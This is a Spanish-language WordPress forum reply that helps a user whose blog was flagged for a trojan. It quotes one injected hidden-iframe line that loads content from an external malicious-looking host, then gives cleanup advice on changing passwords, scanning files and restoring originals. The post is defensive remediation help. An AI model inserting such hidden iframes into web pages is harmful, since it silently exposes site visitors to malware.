Respuesta a: Troyano detectado por avast

Inicio Foros WordPress General WordPress.org Troyano detectado por avast Respuesta a: Troyano detectado por avast

#34310

fum
Participante

Hola, tuve un problema grave y me parece puede ser lo que esté atacando tu blog:

Entrá a los archivos index y fijate si encontrás unas líneas semejantes a esto:

<iframe src=”http://c9u.at:8080/ts/in.cgi?pepsi147″ width=125 height=125 style=”visibility: hidden”></iframe>

La url puede ser otra.
Si encontrás eso tomátelo con paciencia y hacé lo siguiente:

1. Lo mejor sería que desde otra máquina que sepas que está limpia de virus (ideal hacerlo desde una Mac o desde un sistema Linux) cambiá tus contraseñas de FTP, y de WP. Esto, porque probablemente te robaron las contraseñas y un robot entra con intervalos de tiempo a tu blog e inserta esas líneas de código malicioso, no solamente en los index sino también en otros archivos. El cambio de contraseñas es para que no puedan volver a acceder. Si no podés hacerlo desde otra máquina asegurate de limpiar la tuya de virus para que no te roben las contraseñas nuevas. (a mi me pasaba eso y la cosa parecía no tener fin) El antivirus que tenía no detectaba la infección lo solucioné con Avira.

2. Instalá [url=http://ocaoimh.ie/exploit-scanner/]Exploit Scaner[/url] es un pluging que escanea todo WP e identifica todas las líneas de código que podrían ser maliciosas, pero ojo vos tenés que diferenciar las que corresponden a código auténtico de las insertadas por el virus … Para eso, abrí los archivos correspondientes de la instalación de WP, o del plugin del que se trate y fijate si esas líneas existen en el original. Si existen las dejás y si no las borrás. En algunos casos podés reemplazar los archivos infectados por los originales.

Una vez que limpiaste todo y con las contraseñas cambiadas no deberías tener más problema …
Dale una mirada a este [url=http://cucoalmeria.net/2009/01/evitar-ser-hackeado-pon-seguridad-en-wordpress/]blog[/url], vas a encontrar varias entradas que ayudan con esto.

Tenés que hacerlo rápido, sino Google te identifica con un sitio que incluye código malicioso y te pone un estupendo cartel que dice “Sitio peligroso” y recomienda no entrar a tu blog. Si llega a ocurrirte esto, igual se soluciona.
No deseperes pero ocupate del asunto.

Suerte y saludos.

Pin It on Pinterest

Ir al contenido